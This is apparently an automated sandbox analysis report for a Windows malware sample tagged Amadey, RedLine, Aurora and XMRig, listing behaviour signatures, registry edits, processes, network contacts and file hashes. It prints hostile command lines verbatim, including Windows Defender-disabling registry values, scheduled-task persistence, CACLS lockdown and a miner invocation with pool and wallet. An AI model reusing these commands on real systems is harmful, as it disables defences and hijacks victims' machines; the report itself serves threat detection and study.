Analysis Overview
SHA256
da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
Threat Level: Known bad
The file da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e was found to be: Known bad.
Malicious Activity Summary
Amadey
Aurora
RedLine payload
Modifies Windows Defender Real-time Protection settings
RedLine
xmrig
XMRig Miner payload
Downloads MZ/PE file
Reads user/profile data of web browsers
Executes dropped EXE
Windows security modification
Loads dropped DLL
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-24 23:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-24 23:51
Reported
2023-02-24 23:53
Platform
win10-20230220-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3516 set thread context of 3996 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\rundll32.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe
"C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 42iqvxeZwhYZGrYzGc44d3fv9Aq6TQ5jLbULdoHwfUd3Cnw6Ji2NC8G2LMxr6SwWTDGbrQs5rPXLk5odWxxnuj13K7yPrKZ.RIG1 -p X --algo rx/0 --cpu-max-threads-hint=50
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1848 -s 608
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
Network
| Country | Destination | Domain | Proto |
| DE | 193.233.20.23:4124 | tcp | |
| US | 8.8.8.8:53 | 23.20.233.193.in-addr.arpa | udp |
| JP | 40.74.98.194:443 | tcp | |
| DE | 193.233.20.23:4124 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
| DE | 193.233.20.15:80 | 193.233.20.15 | tcp |
| DE | 193.233.20.19:80 | 193.233.20.19 | tcp |
| US | 8.8.8.8:53 | 19.20.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.20.233.193.in-addr.arpa | udp |
| RU | 62.204.41.245:80 | 62.204.41.245 | tcp |
| US | 8.8.8.8:53 | 245.41.204.62.in-addr.arpa | udp |
| RU | 62.204.41.88:80 | 62.204.41.88 | tcp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 88.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| NL | 45.15.159.15:80 | 45.15.159.15 | tcp |
| NL | 212.87.204.93:8081 | tcp | |
| US | 8.8.8.8:53 | 15.159.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | tcp | |
| DE | 193.233.20.23:4124 | tcp | |
| US | 8.8.8.8:53 | xiaoxiaojue.duckdns.org | udp |
| NL | 212.87.204.245:55215 | xiaoxiaojue.duckdns.org | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 245.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
| MD5 | 48d76ba7eba9fe36abfdcf0eb805d4e6 |
| SHA1 | 50290672b453e591c60754011b3651ed80acee6a |
| SHA256 | 98f0908162a9ff04724af618b89f18f372c516aa308bc45a960cfd5732a319a3 |
| SHA512 | 6959d0c37e5da7b7f26d827a8b51972a901a1f8262a5b4f5af485fe10b4e1cfe57d2c17b6c2b84e8cd8282ddfbc8d673ef5c5b82b3fa2ec34ccc2bc9aca3e029 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
| MD5 | 48d76ba7eba9fe36abfdcf0eb805d4e6 |
| SHA1 | 50290672b453e591c60754011b3651ed80acee6a |
| SHA256 | 98f0908162a9ff04724af618b89f18f372c516aa308bc45a960cfd5732a319a3 |
| SHA512 | 6959d0c37e5da7b7f26d827a8b51972a901a1f8262a5b4f5af485fe10b4e1cfe57d2c17b6c2b84e8cd8282ddfbc8d673ef5c5b82b3fa2ec34ccc2bc9aca3e029 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
| MD5 | 011f572cd01040ae90f4c2bec985279e |
| SHA1 | 53b48ee92c94b118051ae561091cf3f09445e5a2 |
| SHA256 | 88feb9c9fefc90e4e5692cbe903f14acf18d2abc3811a7cbe1c22634b83c3021 |
| SHA512 | 198edfebf162d32c88f58eb1dd415110fed01655164e6e195a2b1ec7863a7d300ca04ff3cbac7b96f0abef9e31304b4f68479d909a93ca311ba6bc2f6fb9d4f5 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
| MD5 | 011f572cd01040ae90f4c2bec985279e |
| SHA1 | 53b48ee92c94b118051ae561091cf3f09445e5a2 |
| SHA256 | 88feb9c9fefc90e4e5692cbe903f14acf18d2abc3811a7cbe1c22634b83c3021 |
| SHA512 | 198edfebf162d32c88f58eb1dd415110fed01655164e6e195a2b1ec7863a7d300ca04ff3cbac7b96f0abef9e31304b4f68479d909a93ca311ba6bc2f6fb9d4f5 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
| MD5 | 24c66ce9bd9f1848461d318aaa2965d1 |
| SHA1 | e1654fb970dd38239f22aa980faf5db20fe6ac31 |
| SHA256 | 651f812f9cdeed77d6a0078fdc425a036ef00dff1b452da53683b048522c2b33 |
| SHA512 | 263841ddd5975ee6229469db9e59e3a50523b4bb2d4c8bf8350fc8e614a288440103176b8321b9fc582a020e8ad4eff28496aa0d92e8fecb7c584c3f321ab92c |
